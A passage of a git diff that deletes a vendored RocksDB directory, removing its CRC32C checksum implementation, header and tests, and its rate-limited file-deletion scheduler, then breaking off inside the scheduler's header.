-  0x809c2506, 0x933ebd71, 0xa7d915e8, 0xb47b8d9f,
-  0xce1644da, 0xddb4dcad, 0xe9537434, 0xfaf1ec43,
-  0x1d88e6be, 0x0e2a7ec9, 0x3acdd650, 0x296f4e27,
-  0x53028762, 0x40a01f15, 0x7447b78c, 0x67e52ffb,
-  0xbf59d487, 0xacfb4cf0, 0x981ce469, 0x8bbe7c1e,
-  0xf1d3b55b, 0xe2712d2c, 0xd69685b5, 0xc5341dc2,
-  0x224d173f, 0x31ef8f48, 0x050827d1, 0x16aabfa6,
-  0x6cc776e3, 0x7f65ee94, 0x4b82460d, 0x5820de7a,
-  0xfbc3faf9, 0xe861628e, 0xdc86ca17, 0xcf245260,
-  0xb5499b25, 0xa6eb0352, 0x920cabcb, 0x81ae33bc,
-  0x66d73941, 0x7575a136, 0x419209af, 0x523091d8,
-  0x285d589d, 0x3bffc0ea, 0x0f186873, 0x1cbaf004,
-  0xc4060b78, 0xd7a4930f, 0xe3433b96, 0xf0e1a3e1,
-  0x8a8c6aa4, 0x992ef2d3, 0xadc95a4a, 0xbe6bc23d,
-  0x5912c8c0, 0x4ab050b7, 0x7e57f82e, 0x6df56059,
-  0x1798a91c, 0x043a316b, 0x30dd99f2, 0x237f0185,
-  0x844819fb, 0x97ea818c, 0xa30d2915, 0xb0afb162,
-  0xcac27827, 0xd960e050, 0xed8748c9, 0xfe25d0be,
-  0x195cda43, 0x0afe4234, 0x3e19eaad, 0x2dbb72da,
-  0x57d6bb9f, 0x447423e8, 0x70938b71, 0x63311306,
-  0xbb8de87a, 0xa82f700d, 0x9cc8d894, 0x8f6a40e3,
-  0xf50789a6, 0xe6a511d1, 0xd242b948, 0xc1e0213f,
-  0x26992bc2, 0x353bb3b5, 0x01dc1b2c, 0x127e835b,
-  0x68134a1e, 0x7bb1d269, 0x4f567af0, 0x5cf4e287,
-  0x04d43cfd, 0x1776a48a, 0x23910c13, 0x30339464,
-  0x4a5e5d21, 0x59fcc556, 0x6d1b6dcf, 0x7eb9f5b8,
-  0x99c0ff45, 0x8a626732, 0xbe85cfab, 0xad2757dc,
-  0xd74a9e99, 0xc4e806ee, 0xf00fae77, 0xe3ad3600,
-  0x3b11cd7c, 0x28b3550b, 0x1c54fd92, 0x0ff665e5,
-  0x759baca0, 0x663934d7, 0x52de9c4e, 0x417c0439,
-  0xa6050ec4, 0xb5a796b3, 0x81403e2a, 0x92e2a65d,
-  0xe88f6f18, 0xfb2df76f, 0xcfca5ff6, 0xdc68c781,
-  0x7b5fdfff, 0x68fd4788, 0x5c1aef11, 0x4fb87766,
-  0x35d5be23, 0x26772654, 0x12908ecd, 0x013216ba,
-  0xe64b1c47, 0xf5e98430, 0xc10e2ca9, 0xd2acb4de,
-  0xa8c17d9b, 0xbb63e5ec, 0x8f844d75, 0x9c26d502,
-  0x449a2e7e, 0x5738b609, 0x63df1e90, 0x707d86e7,
-  0x0a104fa2, 0x19b2d7d5, 0x2d557f4c, 0x3ef7e73b,
-  0xd98eedc6, 0xca2c75b1, 0xfecbdd28, 0xed69455f,
-  0x97048c1a, 0x84a6146d, 0xb041bcf4, 0xa3e32483
-};
-static const uint32_t table2_[256] = {
-  0x00000000, 0xa541927e, 0x4f6f520d, 0xea2ec073,
-  0x9edea41a, 0x3b9f3664, 0xd1b1f617, 0x74f06469,
-  0x38513ec5, 0x9d10acbb, 0x773e6cc8, 0xd27ffeb6,
-  0xa68f9adf, 0x03ce08a1, 0xe9e0c8d2, 0x4ca15aac,
-  0x70a27d8a, 0xd5e3eff4, 0x3fcd2f87, 0x9a8cbdf9,
-  0xee7cd990, 0x4b3d4bee, 0xa1138b9d, 0x045219e3,
-  0x48f3434f, 0xedb2d131, 0x079c1142, 0xa2dd833c,
-  0xd62de755, 0x736c752b, 0x9942b558, 0x3c032726,
-  0xe144fb14, 0x4405696a, 0xae2ba919, 0x0b6a3b67,
-  0x7f9a5f0e, 0xdadbcd70, 0x30f50d03, 0x95b49f7d,
-  0xd915c5d1, 0x7c5457af, 0x967a97dc, 0x333b05a2,
-  0x47cb61cb, 0xe28af3b5, 0x08a433c6, 0xade5a1b8,
-  0x91e6869e, 0x34a714e0, 0xde89d493, 0x7bc846ed,
-  0x0f382284, 0xaa79b0fa, 0x40577089, 0xe516e2f7,
-  0xa9b7b85b, 0x0cf62a25, 0xe6d8ea56, 0x43997828,
-  0x37691c41, 0x92288e3f, 0x78064e4c, 0xdd47dc32,
-  0xc76580d9, 0x622412a7, 0x880ad2d4, 0x2d4b40aa,
-  0x59bb24c3, 0xfcfab6bd, 0x16d476ce, 0xb395e4b0,
-  0xff34be1c, 0x5a752c62, 0xb05bec11, 0x151a7e6f,
-  0x61ea1a06, 0xc4ab8878, 0x2e85480b, 0x8bc4da75,
-  0xb7c7fd53, 0x12866f2d, 0xf8a8af5e, 0x5de93d20,
-  0x29195949, 0x8c58cb37, 0x66760b44, 0xc337993a,
-  0x8f96c396, 0x2ad751e8, 0xc0f9919b, 0x65b803e5,
-  0x1148678c, 0xb409f5f2, 0x5e273581, 0xfb66a7ff,
-  0x26217bcd, 0x8360e9b3, 0x694e29c0, 0xcc0fbbbe,
-  0xb8ffdfd7, 0x1dbe4da9, 0xf7908dda, 0x52d11fa4,
-  0x1e704508, 0xbb31d776, 0x511f1705, 0xf45e857b,
-  0x80aee112, 0x25ef736c, 0xcfc1b31f, 0x6a802161,
-  0x56830647, 0xf3c29439, 0x19ec544a, 0xbcadc634,
-  0xc85da25d, 0x6d1c3023, 0x8732f050, 0x2273622e,
-  0x6ed23882, 0xcb93aafc, 0x21bd6a8f, 0x84fcf8f1,
-  0xf00c9c98, 0x554d0ee6, 0xbf63ce95, 0x1a225ceb,
-  0x8b277743, 0x2e66e53d, 0xc448254e, 0x6109b730,
-  0x15f9d359, 0xb0b84127, 0x5a968154, 0xffd7132a,
-  0xb3764986, 0x1637dbf8, 0xfc191b8b, 0x595889f5,
-  0x2da8ed9c, 0x88e97fe2, 0x62c7bf91, 0xc7862def,
-  0xfb850ac9, 0x5ec498b7, 0xb4ea58c4, 0x11abcaba,
-  0x655baed3, 0xc01a3cad, 0x2a34fcde, 0x8f756ea0,
-  0xc3d4340c, 0x6695a672, 0x8cbb6601, 0x29faf47f,
-  0x5d0a9016, 0xf84b0268, 0x1265c21b, 0xb7245065,
-  0x6a638c57, 0xcf221e29, 0x250cde5a, 0x804d4c24,
-  0xf4bd284d, 0x51fcba33, 0xbbd27a40, 0x1e93e83e,
-  0x5232b292, 0xf77320ec, 0x1d5de09f, 0xb81c72e1,
-  0xccec1688, 0x69ad84f6, 0x83834485, 0x26c2d6fb,
-  0x1ac1f1dd, 0xbf8063a3, 0x55aea3d0, 0xf0ef31ae,
-  0x841f55c7, 0x215ec7b9, 0xcb7007ca, 0x6e3195b4,
-  0x2290cf18, 0x87d15d66, 0x6dff9d15, 0xc8be0f6b,
-  0xbc4e6b02, 0x190ff97c, 0xf321390f, 0x5660ab71,
-  0x4c42f79a, 0xe90365e4, 0x032da597, 0xa66c37e9,
-  0xd29c5380, 0x77ddc1fe, 0x9df3018d, 0x38b293f3,
-  0x7413c95f, 0xd1525b21, 0x3b7c9b52, 0x9e3d092c,
-  0xeacd6d45, 0x4f8cff3b, 0xa5a23f48, 0x00e3ad36,
-  0x3ce08a10, 0x99a1186e, 0x738fd81d, 0xd6ce4a63,
-  0xa23e2e0a, 0x077fbc74, 0xed517c07, 0x4810ee79,
-  0x04b1b4d5, 0xa1f026ab, 0x4bdee6d8, 0xee9f74a6,
-  0x9a6f10cf, 0x3f2e82b1, 0xd50042c2, 0x7041d0bc,
-  0xad060c8e, 0x08479ef0, 0xe2695e83, 0x4728ccfd,
-  0x33d8a894, 0x96993aea, 0x7cb7fa99, 0xd9f668e7,
-  0x9557324b, 0x3016a035, 0xda386046, 0x7f79f238,
-  0x0b899651, 0xaec8042f, 0x44e6c45c, 0xe1a75622,
-  0xdda47104, 0x78e5e37a, 0x92cb2309, 0x378ab177,
-  0x437ad51e, 0xe63b4760, 0x0c158713, 0xa954156d,
-  0xe5f54fc1, 0x40b4ddbf, 0xaa9a1dcc, 0x0fdb8fb2,
-  0x7b2bebdb, 0xde6a79a5, 0x3444b9d6, 0x91052ba8
-};
-static const uint32_t table3_[256] = {
-  0x00000000, 0xdd45aab8, 0xbf672381, 0x62228939,
-  0x7b2231f3, 0xa6679b4b, 0xc4451272, 0x1900b8ca,
-  0xf64463e6, 0x2b01c95e, 0x49234067, 0x9466eadf,
-  0x8d665215, 0x5023f8ad, 0x32017194, 0xef44db2c,
-  0xe964b13d, 0x34211b85, 0x560392bc, 0x8b463804,
-  0x924680ce, 0x4f032a76, 0x2d21a34f, 0xf06409f7,
-  0x1f20d2db, 0xc2657863, 0xa047f15a, 0x7d025be2,
-  0x6402e328, 0xb9474990, 0xdb65c0a9, 0x06206a11,
-  0xd725148b, 0x0a60be33, 0x6842370a, 0xb5079db2,
-  0xac072578, 0x71428fc0, 0x136006f9, 0xce25ac41,
-  0x2161776d, 0xfc24ddd5, 0x9e0654ec, 0x4343fe54,
-  0x5a43469e, 0x8706ec26, 0xe524651f, 0x3861cfa7,
-  0x3e41a5b6, 0xe3040f0e, 0x81268637, 0x5c632c8f,
-  0x45639445, 0x98263efd, 0xfa04b7c4, 0x27411d7c,
-  0xc805c650, 0x15406ce8, 0x7762e5d1, 0xaa274f69,
-  0xb327f7a3, 0x6e625d1b, 0x0c40d422, 0xd1057e9a,
-  0xaba65fe7, 0x76e3f55f, 0x14c17c66, 0xc984d6de,
-  0xd0846e14, 0x0dc1c4ac, 0x6fe34d95, 0xb2a6e72d,
-  0x5de23c01, 0x80a796b9, 0xe2851f80, 0x3fc0b538,
-  0x26c00df2, 0xfb85a74a, 0x99a72e73, 0x44e284cb,
-  0x42c2eeda, 0x9f874462, 0xfda5cd5b, 0x20e067e3,
-  0x39e0df29, 0xe4a57591, 0x8687fca8, 0x5bc25610,
-  0xb4868d3c, 0x69c32784, 0x0be1aebd, 0xd6a40405,
-  0xcfa4bccf, 0x12e11677, 0x70c39f4e, 0xad8635f6,
-  0x7c834b6c, 0xa1c6e1d4, 0xc3e468ed, 0x1ea1c255,
-  0x07a17a9f, 0xdae4d027, 0xb8c6591e, 0x6583f3a6,
-  0x8ac7288a, 0x57828232, 0x35a00b0b, 0xe8e5a1b3,
-  0xf1e51979, 0x2ca0b3c1, 0x4e823af8, 0x93c79040,
-  0x95e7fa51, 0x48a250e9, 0x2a80d9d0, 0xf7c57368,
-  0xeec5cba2, 0x3380611a, 0x51a2e823, 0x8ce7429b,
-  0x63a399b7, 0xbee6330f, 0xdcc4ba36, 0x0181108e,
-  0x1881a844, 0xc5c402fc, 0xa7e68bc5, 0x7aa3217d,
-  0x52a0c93f, 0x8fe56387, 0xedc7eabe, 0x30824006,
-  0x2982f8cc, 0xf4c75274, 0x96e5db4d, 0x4ba071f5,
-  0xa4e4aad9, 0x79a10061, 0x1b838958, 0xc6c623e0,
-  0xdfc69b2a, 0x02833192, 0x60a1b8ab, 0xbde41213,
-  0xbbc47802, 0x6681d2ba, 0x04a35b83, 0xd9e6f13b,
-  0xc0e649f1, 0x1da3e349, 0x7f816a70, 0xa2c4c0c8,
-  0x4d801be4, 0x90c5b15c, 0xf2e73865, 0x2fa292dd,
-  0x36a22a17, 0xebe780af, 0x89c50996, 0x5480a32e,
-  0x8585ddb4, 0x58c0770c, 0x3ae2fe35, 0xe7a7548d,
-  0xfea7ec47, 0x23e246ff, 0x41c0cfc6, 0x9c85657e,
-  0x73c1be52, 0xae8414ea, 0xcca69dd3, 0x11e3376b,
-  0x08e38fa1, 0xd5a62519, 0xb784ac20, 0x6ac10698,
-  0x6ce16c89, 0xb1a4c631, 0xd3864f08, 0x0ec3e5b0,
-  0x17c35d7a, 0xca86f7c2, 0xa8a47efb, 0x75e1d443,
-  0x9aa50f6f, 0x47e0a5d7, 0x25c22cee, 0xf8878656,
-  0xe1873e9c, 0x3cc29424, 0x5ee01d1d, 0x83a5b7a5,
-  0xf90696d8, 0x24433c60, 0x4661b559, 0x9b241fe1,
-  0x8224a72b, 0x5f610d93, 0x3d4384aa, 0xe0062e12,
-  0x0f42f53e, 0xd2075f86, 0xb025d6bf, 0x6d607c07,
-  0x7460c4cd, 0xa9256e75, 0xcb07e74c, 0x16424df4,
-  0x106227e5, 0xcd278d5d, 0xaf050464, 0x7240aedc,
-  0x6b401616, 0xb605bcae, 0xd4273597, 0x09629f2f,
-  0xe6264403, 0x3b63eebb, 0x59416782, 0x8404cd3a,
-  0x9d0475f0, 0x4041df48, 0x22635671, 0xff26fcc9,
-  0x2e238253, 0xf36628eb, 0x9144a1d2, 0x4c010b6a,
-  0x5501b3a0, 0x88441918, 0xea669021, 0x37233a99,
-  0xd867e1b5, 0x05224b0d, 0x6700c234, 0xba45688c,
-  0xa345d046, 0x7e007afe, 0x1c22f3c7, 0xc167597f,
-  0xc747336e, 0x1a0299d6, 0x782010ef, 0xa565ba57,
-  0xbc65029d, 0x6120a825, 0x0302211c, 0xde478ba4,
-  0x31035088, 0xec46fa30, 0x8e647309, 0x5321d9b1,
-  0x4a21617b, 0x9764cbc3, 0xf54642fa, 0x2803e842
-};
-
-// Used to fetch a naturally-aligned 32-bit word in little endian byte-order
-static inline uint32_t LE_LOAD32(const uint8_t *p) {
-  return DecodeFixed32(reinterpret_cast<const char*>(p));
-}
-
-#if defined(HAVE_SSE42) && (defined(__LP64__) || defined(_WIN64))
-static inline uint64_t LE_LOAD64(const uint8_t *p) {
-  return DecodeFixed64(reinterpret_cast<const char*>(p));
-}
-#endif
-
-static inline void Slow_CRC32(uint64_t* l, uint8_t const **p) {
-  uint32_t c = static_cast<uint32_t>(*l ^ LE_LOAD32(*p));
-  *p += 4;
-  *l = table3_[c & 0xff] ^
-  table2_[(c >> 8) & 0xff] ^
-  table1_[(c >> 16) & 0xff] ^
-  table0_[c >> 24];
-  // DO it twice.
-  c = static_cast<uint32_t>(*l ^ LE_LOAD32(*p));
-  *p += 4;
-  *l = table3_[c & 0xff] ^
-  table2_[(c >> 8) & 0xff] ^
-  table1_[(c >> 16) & 0xff] ^
-  table0_[c >> 24];
-}
-
-static inline void Fast_CRC32(uint64_t* l, uint8_t const **p) {
-#ifndef HAVE_SSE42
-  Slow_CRC32(l, p);
-#elif defined(__LP64__) || defined(_WIN64)
-  *l = _mm_crc32_u64(*l, LE_LOAD64(*p));
-  *p += 8;
-#else
-  *l = _mm_crc32_u32(static_cast<unsigned int>(*l), LE_LOAD32(*p));
-  *p += 4;
-  *l = _mm_crc32_u32(static_cast<unsigned int>(*l), LE_LOAD32(*p));
-  *p += 4;
-#endif
-}
-
-template<void (*CRC32)(uint64_t*, uint8_t const**)>
-uint32_t ExtendImpl(uint32_t crc, const char* buf, size_t size) {
-  const uint8_t *p = reinterpret_cast<const uint8_t *>(buf);
-  const uint8_t *e = p + size;
-  uint64_t l = crc ^ 0xffffffffu;
-
-// Align n to (1 << m) byte boundary
-#define ALIGN(n, m)     ((n + ((1 << m) - 1)) & ~((1 << m) - 1))
-
-#define STEP1 do {                              \
-    int c = (l & 0xff) ^ *p++;                  \
-    l = table0_[c] ^ (l >> 8);                  \
-} while (0)
-
-
-  // Point x at first 16-byte aligned byte in string.  This might be
-  // just past the end of the string.
-  const uintptr_t pval = reinterpret_cast<uintptr_t>(p);
-  const uint8_t* x = reinterpret_cast<const uint8_t*>(ALIGN(pval, 4));
-  if (x <= e) {
-    // Process bytes until finished or p is 16-byte aligned
-    while (p != x) {
-      STEP1;
-    }
-  }
-  // Process bytes 16 at a time
-  while ((e-p) >= 16) {
-    CRC32(&l, &p);
-    CRC32(&l, &p);
-  }
-  // Process bytes 8 at a time
-  while ((e-p) >= 8) {
-    CRC32(&l, &p);
-  }
-  // Process the last few bytes
-  while (p != e) {
-    STEP1;
-  }
-#undef STEP1
-#undef ALIGN
-  return static_cast<uint32_t>(l ^ 0xffffffffu);
-}
-
-// Detect if SS42 or not.
-static bool isSSE42() {
-#ifndef HAVE_SSE42
-  return false;
-#elif defined(__GNUC__) && defined(__x86_64__) && !defined(IOS_CROSS_COMPILE)
-  uint32_t c_;
-  uint32_t d_;
-  __asm__("cpuid" : "=c"(c_), "=d"(d_) : "a"(1) : "ebx");
-  return c_ & (1U << 20);  // copied from CpuId.h in Folly.
-#elif defined(_WIN64)
-  int info[4];
-  __cpuidex(info, 0x00000001, 0);
-  return (info[2] & ((int)1 << 20)) != 0;
-#else
-  return false;
-#endif
-}
-
-typedef uint32_t (*Function)(uint32_t, const char*, size_t);
-
-static inline Function Choose_Extend() {
-  return isSSE42() ? ExtendImpl<Fast_CRC32> : ExtendImpl<Slow_CRC32>;
-}
-
-bool IsFastCrc32Supported() {
-  return isSSE42();
-}
-
-Function ChosenExtend = Choose_Extend();
-
-uint32_t Extend(uint32_t crc, const char* buf, size_t size) {
-  return ChosenExtend(crc, buf, size);
-}
-
-}  // namespace crc32c
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/crc32c.h b/thirdparty/rocksdb/util/crc32c.h
deleted file mode 100644
index 9848529..0000000
--- a/thirdparty/rocksdb/util/crc32c.h
+++ /dev/null
@@ -1,48 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <stddef.h>
-#include <stdint.h>
-
-namespace rocksdb {
-namespace crc32c {
-
-extern bool IsFastCrc32Supported();
-
-// Return the crc32c of concat(A, data[0,n-1]) where init_crc is the
-// crc32c of some string A.  Extend() is often used to maintain the
-// crc32c of a stream of data.
-extern uint32_t Extend(uint32_t init_crc, const char* data, size_t n);
-
-// Return the crc32c of data[0,n-1]
-inline uint32_t Value(const char* data, size_t n) {
-  return Extend(0, data, n);
-}
-
-static const uint32_t kMaskDelta = 0xa282ead8ul;
-
-// Return a masked representation of crc.
-//
-// Motivation: it is problematic to compute the CRC of a string that
-// contains embedded CRCs.  Therefore we recommend that CRCs stored
-// somewhere (e.g., in files) should be masked before being stored.
-inline uint32_t Mask(uint32_t crc) {
-  // Rotate right by 15 bits and add a constant.
-  return ((crc >> 15) | (crc << 17)) + kMaskDelta;
-}
-
-// Return the crc whose masked representation is masked_crc.
-inline uint32_t Unmask(uint32_t masked_crc) {
-  uint32_t rot = masked_crc - kMaskDelta;
-  return ((rot >> 17) | (rot << 15));
-}
-
-}  // namespace crc32c
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/crc32c_test.cc b/thirdparty/rocksdb/util/crc32c_test.cc
deleted file mode 100644
index 306194e..0000000
--- a/thirdparty/rocksdb/util/crc32c_test.cc
+++ /dev/null
@@ -1,78 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/crc32c.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-namespace crc32c {
-
-class CRC { };
-
-TEST(CRC, StandardResults) {
-  // From rfc3720 section B.4.
-  char buf[32];
-
-  memset(buf, 0, sizeof(buf));
-  ASSERT_EQ(0x8a9136aaU, Value(buf, sizeof(buf)));
-
-  memset(buf, 0xff, sizeof(buf));
-  ASSERT_EQ(0x62a8ab43U, Value(buf, sizeof(buf)));
-
-  for (int i = 0; i < 32; i++) {
-    buf[i] = i;
-  }
-  ASSERT_EQ(0x46dd794eU, Value(buf, sizeof(buf)));
-
-  for (int i = 0; i < 32; i++) {
-    buf[i] = 31 - i;
-  }
-  ASSERT_EQ(0x113fdb5cU, Value(buf, sizeof(buf)));
-
-  unsigned char data[48] = {
-    0x01, 0xc0, 0x00, 0x00,
-    0x00, 0x00, 0x00, 0x00,
-    0x00, 0x00, 0x00, 0x00,
-    0x00, 0x00, 0x00, 0x00,
-    0x14, 0x00, 0x00, 0x00,
-    0x00, 0x00, 0x04, 0x00,
-    0x00, 0x00, 0x00, 0x14,
-    0x00, 0x00, 0x00, 0x18,
-    0x28, 0x00, 0x00, 0x00,
-    0x00, 0x00, 0x00, 0x00,
-    0x02, 0x00, 0x00, 0x00,
-    0x00, 0x00, 0x00, 0x00,
-  };
-  ASSERT_EQ(0xd9963a56, Value(reinterpret_cast<char*>(data), sizeof(data)));
-}
-
-TEST(CRC, Values) {
-  ASSERT_NE(Value("a", 1), Value("foo", 3));
-}
-
-TEST(CRC, Extend) {
-  ASSERT_EQ(Value("hello world", 11),
-            Extend(Value("hello ", 6), "world", 5));
-}
-
-TEST(CRC, Mask) {
-  uint32_t crc = Value("foo", 3);
-  ASSERT_NE(crc, Mask(crc));
-  ASSERT_NE(crc, Mask(Mask(crc)));
-  ASSERT_EQ(crc, Unmask(Mask(crc)));
-  ASSERT_EQ(crc, Unmask(Unmask(Mask(Mask(crc)))));
-}
-
-}  // namespace crc32c
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/delete_scheduler.cc b/thirdparty/rocksdb/util/delete_scheduler.cc
deleted file mode 100644
index 93fc166..0000000
--- a/thirdparty/rocksdb/util/delete_scheduler.cc
+++ /dev/null
@@ -1,234 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "util/delete_scheduler.h"
-
-#include <thread>
-#include <vector>
-
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/sst_file_manager_impl.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-DeleteScheduler::DeleteScheduler(Env* env, const std::string& trash_dir,
-                                 int64_t rate_bytes_per_sec, Logger* info_log,
-                                 SstFileManagerImpl* sst_file_manager)
-    : env_(env),
-      trash_dir_(trash_dir),
-      total_trash_size_(0),
-      rate_bytes_per_sec_(rate_bytes_per_sec),
-      pending_files_(0),
-      closing_(false),
-      cv_(&mu_),
-      info_log_(info_log),
-      sst_file_manager_(sst_file_manager) {
-  assert(sst_file_manager != nullptr);
-  bg_thread_.reset(
-      new port::Thread(&DeleteScheduler::BackgroundEmptyTrash, this));
-}
-
-DeleteScheduler::~DeleteScheduler() {
-  {
-    InstrumentedMutexLock l(&mu_);
-    closing_ = true;
-    cv_.SignalAll();
-  }
-  if (bg_thread_) {
-    bg_thread_->join();
-  }
-}
-
-Status DeleteScheduler::DeleteFile(const std::string& file_path) {
-  Status s;
-  if (rate_bytes_per_sec_.load() <= 0 ||
-      total_trash_size_.load() >
-          sst_file_manager_->GetTotalSize() * max_trash_db_ratio_) {
-    // Rate limiting is disabled or trash size makes up more than
-    // max_trash_db_ratio_ (default 25%) of the total DB size
-    TEST_SYNC_POINT("DeleteScheduler::DeleteFile");
-    s = env_->DeleteFile(file_path);
-    if (s.ok()) {
-      sst_file_manager_->OnDeleteFile(file_path);
-    }
-    return s;
-  }
-
-  // Move file to trash
-  std::string path_in_trash;
-  s = MoveToTrash(file_path, &path_in_trash);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(info_log_, "Failed to move %s to trash directory (%s)",
-                    file_path.c_str(), trash_dir_.c_str());
-    s = env_->DeleteFile(file_path);
-    if (s.ok()) {
-      sst_file_manager_->OnDeleteFile(file_path);
-    }
-    return s;
-  }
-
-  // Add file to delete queue
-  {
-    InstrumentedMutexLock l(&mu_);
-    queue_.push(path_in_trash);
-    pending_files_++;
-    if (pending_files_ == 1) {
-      cv_.SignalAll();
-    }
-  }
-  return s;
-}
-
-std::map<std::string, Status> DeleteScheduler::GetBackgroundErrors() {
-  InstrumentedMutexLock l(&mu_);
-  return bg_errors_;
-}
-
-Status DeleteScheduler::MoveToTrash(const std::string& file_path,
-                                    std::string* path_in_trash) {
-  Status s;
-  // Figure out the name of the file in trash folder
-  size_t idx = file_path.rfind("/");
-  if (idx == std::string::npos || idx == file_path.size() - 1) {
-    return Status::InvalidArgument("file_path is corrupted");
-  }
-  *path_in_trash = trash_dir_ + file_path.substr(idx);
-  std::string unique_suffix = "";
-
-  if (*path_in_trash == file_path) {
-    // This file is already in trash
-    return s;
-  }
-
-  // TODO(tec) : Implement Env::RenameFileIfNotExist and remove
-  //             file_move_mu mutex.
-  InstrumentedMutexLock l(&file_move_mu_);
-  while (true) {
-    s = env_->FileExists(*path_in_trash + unique_suffix);
-    if (s.IsNotFound()) {
-      // We found a path for our file in trash
-      *path_in_trash += unique_suffix;
-      s = env_->RenameFile(file_path, *path_in_trash);
-      break;
-    } else if (s.ok()) {
-      // Name conflict, generate new random suffix
-      unique_suffix = env_->GenerateUniqueId();
-    } else {
-      // Error during FileExists call, we cannot continue
-      break;
-    }
-  }
-  if (s.ok()) {
-    uint64_t trash_file_size = 0;
-    sst_file_manager_->OnMoveFile(file_path, *path_in_trash, &trash_file_size);
-    total_trash_size_.fetch_add(trash_file_size);
-  }
-  return s;
-}
-
-void DeleteScheduler::BackgroundEmptyTrash() {
-  TEST_SYNC_POINT("DeleteScheduler::BackgroundEmptyTrash");
-
-  while (true) {
-    InstrumentedMutexLock l(&mu_);
-    while (queue_.empty() && !closing_) {
-      cv_.Wait();
-    }
-
-    if (closing_) {
-      return;
-    }
-
-    // Delete all files in queue_
-    uint64_t start_time = env_->NowMicros();
-    uint64_t total_deleted_bytes = 0;
-    int64_t current_delete_rate = rate_bytes_per_sec_.load();
-    while (!queue_.empty() && !closing_) {
-      if (current_delete_rate != rate_bytes_per_sec_.load()) {
-        // User changed the delete rate
-        current_delete_rate = rate_bytes_per_sec_.load();
-        start_time = env_->NowMicros();
-        total_deleted_bytes = 0;
-      }
-
-      // Get new file to delete
-      std::string path_in_trash = queue_.front();
-      queue_.pop();
-
-      // We dont need to hold the lock while deleting the file
-      mu_.Unlock();
-      uint64_t deleted_bytes = 0;
-      // Delete file from trash and update total_penlty value
-      Status s = DeleteTrashFile(path_in_trash,  &deleted_bytes);
-      total_deleted_bytes += deleted_bytes;
-      mu_.Lock();
-
-      if (!s.ok()) {
-        bg_errors_[path_in_trash] = s;
-      }
-
-      // Apply penlty if necessary
-      uint64_t total_penlty;
-      if (current_delete_rate > 0) {
-        // rate limiting is enabled
-        total_penlty =
-            ((total_deleted_bytes * kMicrosInSecond) / current_delete_rate);
-        while (!closing_ && !cv_.TimedWait(start_time + total_penlty)) {}
-      } else {
-        // rate limiting is disabled
-        total_penlty = 0;
-      }
-      TEST_SYNC_POINT_CALLBACK("DeleteScheduler::BackgroundEmptyTrash:Wait",
-                               &total_penlty);
-
-      pending_files_--;
-      if (pending_files_ == 0) {
-        // Unblock WaitForEmptyTrash since there are no more files waiting
-        // to be deleted
-        cv_.SignalAll();
-      }
-    }
-  }
-}
-
-Status DeleteScheduler::DeleteTrashFile(const std::string& path_in_trash,
-                                        uint64_t* deleted_bytes) {
-  uint64_t file_size;
-  Status s = env_->GetFileSize(path_in_trash, &file_size);
-  if (s.ok()) {
-    TEST_SYNC_POINT("DeleteScheduler::DeleteTrashFile:DeleteFile");
-    s = env_->DeleteFile(path_in_trash);
-  }
-
-  if (!s.ok()) {
-    // Error while getting file size or while deleting
-    ROCKS_LOG_ERROR(info_log_, "Failed to delete %s from trash -- %s",
-                    path_in_trash.c_str(), s.ToString().c_str());
-    *deleted_bytes = 0;
-  } else {
-    *deleted_bytes = file_size;
-    total_trash_size_.fetch_sub(file_size);
-    sst_file_manager_->OnDeleteFile(path_in_trash);
-  }
-
-  return s;
-}
-
-void DeleteScheduler::WaitForEmptyTrash() {
-  InstrumentedMutexLock l(&mu_);
-  while (pending_files_ > 0 && !closing_) {
-    cv_.Wait();
-  }
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/util/delete_scheduler.h b/thirdparty/rocksdb/util/delete_scheduler.h
deleted file mode 100644
index 4c07ed6..0000000
--- a/thirdparty/rocksdb/util/delete_scheduler.h
+++ /dev/null
@@ -1,111 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <map>
-#include <queue>
-#include <string>
-#include <thread>
-
-#include "monitoring/instrumented_mutex.h"
-#include "port/port.h"
-
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class Env;
-class Logger;
-class SstFileManagerImpl;
-
-// DeleteScheduler allows the DB to enforce a rate limit on file deletion,
-// Instead of deleteing files immediately, files are moved to trash_dir
-// and deleted in a background thread that apply sleep penlty between deletes
-// if they are happening in a rate faster than rate_bytes_per_sec,
-//
-// Rate limiting can be turned off by setting rate_bytes_per_sec = 0, In this
-// case DeleteScheduler will delete files immediately.
-class DeleteScheduler {
- public:
-  DeleteScheduler(Env* env, const std::string& trash_dir,
-                  int64_t rate_bytes_per_sec, Logger* info_log,
-                  SstFileManagerImpl* sst_file_manager);
-
-  ~DeleteScheduler();
-
